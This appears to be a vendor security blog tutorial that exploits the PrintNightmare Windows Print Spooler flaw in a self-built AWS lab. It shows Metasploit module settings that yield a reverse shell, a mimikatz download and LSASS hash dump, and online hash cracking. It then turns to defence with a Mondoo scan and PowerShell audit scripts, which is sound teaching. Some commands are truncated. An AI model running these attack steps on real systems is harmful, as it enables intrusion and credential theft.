In simpler times, the biggest worries about the Windows Print Spooler were memory leaks and corrupted jobs. But in 2021, this service became a favorite pawn of some of the most destructive ransomware groups across the globe. A security researcher discovered a flaw in the Windows Print Spooler that allows a regular domain user to pose as SYSTEM and execute code on the domain controller. It became Windows vulnerability CVE-2021-34527 / KB5004948, commonly called PrintNightmare.
In this article, I'll walk you through the steps of hacking a Windows machine using the PrintNightmare vulnerability. And I'll show you how you can prevent vulnerabilities like PrintNightmare from inviting attackers into your infrastructure.
Hack a Windows system using PrintNightmare (CVE-2021-34527 / KB5004948)
To ethically penetrate a Windows system, we'll first create a lab environment and then perform the attack within that environment.
Deploy a Windows hacking lab
I created a Terraform template that makes it easy for you to deploy your own Windows hacking lab. This Terraform template deploys two virtual machines in your AWS account:
- A vulnerable Windows machine
- A Kali Linux machine that you'll use to attack the Windows machine
(We're deploying them in the same account just to make this process easy.)
Prerequisites
For this demonstration, you need:
- An AWS Account
- The AWS CLI installed and configured on your system
- Terraform installed on your system
- An AWS EC2 SSH RSA key pair configured
Configure your environment
Before provisioning, set these Terraform environment variables:
For example, I would open a terminal and run these commands:
export TF_VAR_region=us-east-1
export TF_VAR_demo_name=patrick
export TF_VAR_ssh_key=patrick-key
export TF_VAR_publicIP="1.1.1.1/32"
Provision a single environment
1. Clone the GitHub project:
git clone git@github.com:Lunalectric/windows-hack-demo.git
2. Change to the windows-hack-demo folder:
cd windows-hack-demo
3. Initialize the project (download the modules):
terraform init
4. Check that everything is ready:
terraform plan
5. Apply the configuration:
terraform apply -auto-approve
Once the provisioning completes, you see something like this:
Apply complete! Resources: 30 added, 0 changed, 0 destroyed.
Outputs:
hack_write_up = <<EOT
# Hack Windows machine
- login to your Kali machine
........
6. Build your hacking write-up, a set of instructions generated specifically for your deployment of this demonstration. It contains the exact commands to copy:
terraform output | sed "/^EOT/c\ " | sed "/hack_write_up = <<EOT/c\ " | sed 's/
Exploit the PrintNightmare vulnerability in your hacking lab
Now that you've set up your hacking lab, let's hack into your lab's Windows machine using the PrintNightmare vulnerability. First you'll access the system, then you'll gain administrative control.
Hack into the Windows machine
1. In your terminal, connect to the Kali machine from which you'll do the hacking. Refer to your hack-write-up.md file for the address and password.
2. Open Metasploit (a popular, open source penetration testing tool):
msfconsole
3. When Metasploit finishes loading, retrieve the configuration to exploit the PrintNightmare vulnerability:
use exploit/windows/dcerpc/cve_2021_1675_printnightmare
4. Type `show options` to list the module's settings.
5. You need to set the target host, the credentials, and the payload. Enter these commands in succession:
set RHOSTS 10.0.4.105
set SMBUSER mondoo
set SMBPASS mondoo.com
set payload windows/x64/
run
The Kali machine connects to a port and sends the malicious code to the Windows operating system. The code executes on the Windows machine and creates a reverse shell.
6. Check the IP address to make sure you’re connected: Type `ipconfig`. If the IP address matches the RHOSTS, you have a successful shell in the machine. You've hacked in!
Gain root privileges
Now that you're in, you can gain root privileges. (That's almost always an attacker's next step.)
1. To get the NTLM hash of the administrator profile, first enter:
powershell
2. Download mimikatz:
wget "https://github.com/gentilkiwi/mimikatz/releases/download/2.2.0-20210810-2/mimikatz_trunk.zip" -outfile "C:\windows\temp\mimikatz_trunk.zip"
3. Follow these steps:
a. Change the working directory.
b. Decompress the zip file.
c. Change the working directory again.
d. Execute mimikatz.
e. Get the NTLM hash:
cd "C:\windows\temp\mimikatz_trunk.zip"
Expand-Archive mimikatz_trunk.zip -Force
cd mimikatz_trunk\x64
.\mimikatz.exe
sekurlsa::msv
4. Once you have the NTLM hash, go to crackstation.net and enter it in the Hash Cracker. Now you have the clear text admin password.
You've successfully used PrintNightmare to gain administrative access to the Windows system.
Identify security issues that allow attackers into Windows systems
Are you a little unnerved by how easy it was to penetrate and take control of a Windows machine? How confident are you that all of the Windows systems in your fleet are free of the PrintNightmare vulnerability? And what about the hundreds of other gaps in Windows security? How can you be sure that your infrastructure doesn't have security problems that can lead to a complete Windows compromise?
In this section, we'll take on the role of protector instead of hacker. I'll walk you through the process of identifying risks in your Windows systems.
Prerequisite
For this demonstration, you need:
- A Mondoo account. You can get one for free here.
Scan a Windows system
For this demonstration, I've set up a Vagrant Windows machine that you can use.
1. Log in to the Vagrant Windows 2016 system via Remote Desktop Protocol (RDP):
xfreerdp /u:Administrator /v::3389 /h:2048 /w:2048 /p:'Password1!'
2. Open Windows PowerShell as an administrator.
3. Install Mondoo Client:
A. Log into your account at console.mondoo.com
B. Go to the INTEGRATIONS page and select Windows.
C. Set the PowerShell execution policy:
Set-ExecutionPolicy RemoteSigned -scope CurrentUser
D. Copy the CLI commands that Mondoo provides and paste them in the Windows 2016 PowerShell.
E. After the Mondoo Client installation finishes, add the Mondoo path and type mondoo status to verify that Mondoo Client is registered and working. It should look like this:
PS C:\Users\Administrator> $env:Path = 'C:\Program Files\Mondoo\;' + $env:Path
PS C:\Users\Administrator> mondoo status
→ loaded configuration from C:\ProgramData\Mondoo\mondoo.yml using source default
! could not determine client platform information
→ Time: 2022-10-23T17:38:15Z
→ Version: 7.0.2 (API Version: 7)
→ API ConnectionConfig: https://us.api.mondoo.com
→ API Status: SERVING
→ API Time: 2022-10-23T17:38:15Z
→ API Version: 7
→ Space: //captain.api.mondoo.app/spaces/hardcore-bassi-588565
→ Client: //agents.api.mondoo.app/spaces/hardcore-bassi-588565/agents/2GXt8HJ0J8xG2xT4sTBUgtnY3nq
After a Windows restart, the installation path is automatically added to the PowerShell path variable.
F. Quickly verify that the following policies are enabled for your space:
- Platform Overview Information by Mondoo
- Platform End-of-Life Policy by Mondoo
- Platform Vulnerability Policy by Mondoo
- Windows Security by Mondoo
Your POLICY HUB should look like this:
4. Run the Mondoo scan in PowerShell:
mondoo scan local
Mondoo Client connects to the Mondoo backend and downloads the enabled policies. After the scan, Mondoo Client reports results back to the Mondoo backend.
Mondoo scan results
Explore scan results in Mondoo Console
First, let's find the PrintNightmare vulnerability.
1. Select the report URL to open the Mondoo asset overview page, which shows the Windows 2016 asset.
2. Select Platform Vulnerabilities and then select Advisories.
3. Search for KB5004948, the advisory for the PrintNightmare vulnerability we used earlier to access the Windows machine.
Now let's look at the misconfiguration that allowed us to access the NTLM hash of the administrator account:
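Mondoo reports the missing advisory from the outside; the same question can be asked on the host itself. The following PowerShell check is an added example, not code from the original post or from Mondoo. It checks the three things a defender cares about for PrintNightmare: whether the Spooler service is running at all, whether the fix is installed, and whether the Point and Print registry values that Microsoft's post-patch guidance requires are in a safe state. It assumes the host is a Windows Server 2016 build where KB5004948 is the relevant update (other builds carry the fix under a different KB number) and that the shell is elevated.

```powershell
# Added example (not from the original post or the Mondoo project): host-side check for
# PrintNightmare exposure. Assumption: KB5004948 is the update that carries the fix on this
# build; other Windows builds ship the same fix under a different KB number.
$ppKey = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows NT\Printers\PointAndPrint'

function Test-PrintNightmareExposure {
    $findings = [System.Collections.Generic.List[string]]::new()

    # 1. Is the Print Spooler running? On a host that is not a print server, stopping and
    #    disabling the service removes the attack surface regardless of patch level.
    $spooler = Get-Service -Name Spooler -ErrorAction SilentlyContinue
    if ($spooler -and $spooler.Status -eq 'Running') {
        $findings.Add("Spooler service is running (StartType: $($spooler.StartType))")
    }

    # 2. Is the fix installed? Get-HotFix reads the installed-update list; it writes an
    #    error (suppressed here) and returns nothing when the KB is absent.
    $fix = Get-HotFix -Id 'KB5004948' -ErrorAction SilentlyContinue
    if (-not $fix) {
        $findings.Add('KB5004948 is not in the installed-updates list')
    }

    # 3. Point and Print values. Microsoft's guidance: NoWarningNoElevationOnInstall and
    #    UpdatePromptSettings must be 0 or absent; RestrictDriverInstallationToAdministrators
    #    must not be explicitly 0 (the August 2021 updates made "require admin" the default).
    $pp = Get-ItemProperty -Path $ppKey -ErrorAction SilentlyContinue
    foreach ($name in 'NoWarningNoElevationOnInstall', 'UpdatePromptSettings') {
        $actual = if ($pp) { $pp.$name } else { $null }
        if ($null -ne $actual -and [int]$actual -ne 0) {
            $findings.Add("$name is $actual (must be 0 or not set)")
        }
    }
    $restrict = if ($pp) { $pp.RestrictDriverInstallationToAdministrators } else { $null }
    if ($null -ne $restrict -and [int]$restrict -eq 0) {
        $findings.Add('RestrictDriverInstallationToAdministrators is 0 (non-admins may install drivers)')
    }
    return $findings
}

# Wrap in @() so an empty result is still an array with a Count of 0.
$results = @(Test-PrintNightmareExposure)
if ($results.Count -eq 0) {
    Write-Output 'No PrintNightmare exposure found on this host.'
} else {
    Write-Output 'PrintNightmare exposure findings:'
    $results | ForEach-Object { Write-Output " - $_" }
}
```

Run it in the same elevated PowerShell session used for the Mondoo scan. A host that is fully patched but still has a running Spooler and a Point and Print policy that suppresses the elevation prompt will show up here even though the advisory itself is resolved, which is why the registry checks sit beside the hotfix check rather than replacing it.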
1. On the Mondoo Console, select Policies and search for `Debug`.
2. Click to expand the control. You see the description of the problem and how to remediate it.
By default, Windows grants the SeDebugPrivilege user right to local administrators. Whoever holds this right can dump the memory of the lsass.exe process. That process caches the NTLM hashes used during an active session or by a service, and it's this caching that allowed us to gain administrative control of the Windows system.
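To see this control from the host's side, the following script is an added example (not code from the original post or from Mondoo). It lists which principals are assigned SeDebugPrivilege in the local security policy and whether LSASS runs as a protected process (the RunAsPPL setting), which stops unsigned tools from opening lsass.exe for reading even when the caller holds the debug right. It assumes an elevated PowerShell session and that secedit.exe, which ships with Windows, is on the path; the temporary export file name is the example's own choice.

```powershell
# Added example (not from the original post or the Mondoo project): audit SeDebugPrivilege
# holders and LSA protection on the local host. Assumptions: elevated shell, secedit.exe
# available (it ships with Windows), temp file name chosen for this example.

function Get-SeDebugPrivilegeHolders {
    # secedit exports the local policy, including user-rights assignments, as an INI file.
    # The line of interest looks like:  SeDebugPrivilege = *S-1-5-32-544
    $tmp = Join-Path $env:TEMP 'secpol-export.inf'
    secedit.exe /export /cfg $tmp /areas USER_RIGHTS | Out-Null
    $line = Get-Content $tmp | Where-Object { $_ -match '^SeDebugPrivilege\s*=' }
    Remove-Item $tmp -ErrorAction SilentlyContinue
    if (-not $line) { return @() }   # right assigned to nobody

    $sids = ($line -split '=', 2)[1].Trim() -split ',' | ForEach-Object { $_.Trim().TrimStart('*') }
    foreach ($sid in $sids) {
        # Translate each SID to an account name; keep the raw SID when translation fails
        # (for example an orphaned SID left behind by a deleted account).
        try {
            $name = ([System.Security.Principal.SecurityIdentifier]$sid).Translate(
                        [System.Security.Principal.NTAccount]).Value
        } catch { $name = $sid }
        [pscustomobject]@{ Sid = $sid; Account = $name }
    }
}

function Test-LsaProtection {
    # RunAsPPL set to 1 or 2 under HKLM\SYSTEM\CurrentControlSet\Control\Lsa makes LSASS a
    # protected process light, so non-protected processes cannot read its memory.
    $lsa = Get-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\Lsa' -ErrorAction SilentlyContinue
    $runAsPpl = if ($lsa -and $null -ne $lsa.RunAsPPL) { [int]$lsa.RunAsPPL } else { 0 }
    return ($runAsPpl -ge 1)
}

$holders = @(Get-SeDebugPrivilegeHolders)
Write-Output "Principals holding SeDebugPrivilege: $($holders.Count)"
$holders | ForEach-Object { Write-Output " - $($_.Account) ($($_.Sid))" }
if (Test-LsaProtection) {
    Write-Output 'LSA protection (RunAsPPL) is enabled: LSASS memory is not readable by unprotected processes.'
} else {
    Write-Output 'LSA protection (RunAsPPL) is NOT enabled: any SeDebugPrivilege holder can dump LSASS.'
}
```

On an unhardened host the first function typically returns only BUILTIN\Administrators (S-1-5-32-544), and the second reports RunAsPPL as disabled; that combination is exactly the condition the Mondoo control flags. Removing the right from accounts that don't need it and enabling RunAsPPL (after confirming no legitimate software still needs to open LSASS) closes the path used in the walkthrough.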
Mondoo finds vulnerabilities like PrintNightmare and misconfigurations like SeDebug throughout your entire infrastructure—not just on Windows systems but on every platform, container, and VM, and so much more. Use your Mondoo account to keep scanning and discover how you can harden your system security. If you have questions, we're here to help.